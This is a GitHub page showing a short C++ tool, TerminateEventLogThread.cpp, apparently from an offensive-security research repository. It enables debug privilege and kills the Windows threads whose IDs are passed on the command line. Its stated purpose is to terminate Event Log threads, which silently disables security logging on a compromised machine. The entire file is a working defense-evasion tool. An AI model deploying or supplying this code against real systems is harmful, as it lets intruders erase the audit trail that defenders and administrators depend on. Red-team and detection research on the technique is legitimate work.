-
Notifications
You must be signed in to change notification settings - Fork 34
Expand file tree
/
Copy pathTerminateEventLogThread.cpp
More file actions
42 lines (40 loc) · 1.14 KB
/
TerminateEventLogThread.cpp
File metadata and controls
42 lines (40 loc) · 1.14 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
/*
TerminateEventLogThread.cpp
Author:3gstudent@3gstudent
Use to terminate Event Log thread
*/
#include <windows.h>
BOOL SetPrivilege()
{
HANDLE hToken;
TOKEN_PRIVILEGES NewState;
LUID luidPrivilegeLUID;
if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)||!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luidPrivilegeLUID))
{
printf("SetPrivilege Error\n");
return FALSE;
}
NewState.PrivilegeCount = 1;
NewState.Privileges[0].Luid = luidPrivilegeLUID;
NewState.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if(!AdjustTokenPrivileges(hToken, FALSE, &NewState, NULL, NULL, NULL))
{
printf("AdjustTokenPrivilege Errro\n");
return FALSE;
}
return TRUE;
}
int main(int argc, char* argv[])
{
SetPrivilege();
printf("TerminateThread TID:\n");
for(int i=1;i<argc;i++)
{
printf("%s\n",argv[i]);
HANDLE hThread = OpenThread(0x0001, FALSE,atoi(argv[i]));
if(TerminateThread(hThread,0)==0)
printf("[!] TerminateThread Error, TID: %s \n",argv[i]);
CloseHandle(hThread);
}
return 0;
}